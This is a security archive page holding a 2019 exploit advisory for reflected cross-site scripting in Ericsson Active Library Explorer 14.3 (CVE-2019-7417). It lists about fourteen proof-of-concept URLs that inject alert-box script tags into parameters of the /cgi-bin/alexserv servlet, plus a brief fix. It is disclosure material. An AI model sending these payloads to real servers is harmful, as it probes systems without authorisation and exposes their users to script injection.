Ericsson Active Library Explorer (ALEX) 14.3 Cross Site Scripting

Ericsson Active Library Explorer (ALEX) 14.3 Cross Site Scripting: Posted Feb 8, 2019; Authored by Rafael Pedrero; Ericsson Active Library Explorer (ALEX) version 14.3 suffers from a cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2019-7417; SHA-256 | ca39073bd5d5854547f7e14b5058565f86f7dfcdcd06abf43c57a7816f8bf113; Download | Favorite | View

Ericsson Active Library Explorer (ALEX) 14.3 Cross Site Scripting

<!--
# Exploit Title: Cross Site Scripting in Ericsson Active Library Explorer
Server Version 14.3
# Date: 23-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.ericsson.com
# Software Link: http://www.ericsson.com
# Version: Ericsson Active Library Explorer Server Version 14.3
# Tested on: all
# CVE : CVE-2019-7417
# Category: webapps

1. Description

XSS exists in Ericsson Active Library Explorer (ALEX) 14.3 in multiple
parameters in the "/cgi-bin/alexserv" servlet, as demonstrated by the DB,
FN, fn, or id parameter.

Active Library Explorer (ALEX) is server-based software that enables users
to browse Ericsson document libraries and documents with a standard web
browser. It consists of the following two parts, which are typically used
in two different web browser windows:

    Library View a this part contains functions for accessing libraries
within a folder structure. For example, it is possible to search for
libraries, download libraries, or compare library variants. It is also
possible to start a search for documents in several libraries at the same
time.
    Document View a this part contains functions for accessing documents
inside a library. For example, it is possible to search for documents or
within documents in individual libraries, and to print or bookmark
documents.


2. Proof of Concept

URL

http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&fn=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E


Parameter
 fn=<SCRIPT>alert("XSS");</SCRIPT>


URL

http://X.X.X.X/cgi-bin/alexserv?id=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E


Parameter
 id=<SCRIPT>alert("XSS");</SCRIPT>


URL

http://X.X.X.X/cgi-bin/alexserv?VR=R18D&id=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&fn=docno_metadata.txt


Parameter
 id=<SCRIPT>alert("XSS");</SCRIPT>


URL

http://X.X.X.X/cgi-bin/alexserv?VR=R18D&id=23034&fn=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E


Parameter
 fn=<SCRIPT>alert("XSS");</SCRIPT>


URL

http://X.X.X.X/cgi-bin/alexserv?ID=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=hlex_help.html


Parameter
 ID=<SCRIPT>alert("XSS");</SCRIPT>


URL

http://X.X.X.X/cgi-bin/alexserv?ID=3020&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E


Parameter
 FN=<SCRIPT>alert("XSS");</SCRIPT>


URL

http://X.X.X.X/cgi-bin/alexserv?ac=LINK&id=23034&DB=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=alex.html


Parameter
 DB=<SCRIPT>alert("XSS");</SCRIPT>


URL

http://X.X.X.X/cgi-bin/alexserv?ac=LINK&id=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E


Parameter
 FN=<SCRIPT>alert("XSS");</SCRIPT>


URL

http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E


Parameter
 FN=<SCRIPT>alert("XSS");</SCRIPT>


URL

http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&ac=image&fn=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E


Parameter
 fn=<SCRIPT>alert("XSS");</SCRIPT>


URL

http://X.X.X.X/cgi-bin/alexserv?VR=R18D&DB=alex_help.ahx&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&CH=LibraryBrowser


Parameter
 FN=<SCRIPT>alert("XSS");</SCRIPT>


URL

http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=12446-2885Uen.E.html


Parameter
 DB=<SCRIPT>alert("XSS");</SCRIPT>


URL

http://X.X.X.X/cgi-bin/alexserv?ID=23034&DB=BSP_R8.1-LZN7800023_R8B.alx&AC=image&FN=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E


Parameter
 FN=<SCRIPT>alert("XSS");</SCRIPT>


URL

http://X.X.X.X/cgi-bin/alexserv?VR=R18D&DB=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&FN=help.html&CH=LibraryBrowser


Parameter
 DB=<SCRIPT>alert("XSS");</SCRIPT>


3. Solution:

Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


-->

Top Authors In Last 30 Days

Red Hat 254 files
Ubuntu 59 files
LiquidWorm 28 files
indoushka 20 files
Debian 19 files
Apple 10 files
Google Security Research 7 files
Chokri Hammedi 3 files
Jann Horn 3 files
Emiliano Febbi 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,154)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,754)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,190)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,958)
UNIX (9,473)
UnixWare (188)
Windows (6,784)
Other

Ericsson Active Library Explorer (ALEX) 14.3 Cross Site Scripting

Ericsson Active Library Explorer (ALEX) 14.3 Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Ericsson Active Library Explorer (ALEX) 14.3 Cross Site Scripting

Share This

Ericsson Active Library Explorer (ALEX) 14.3 Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems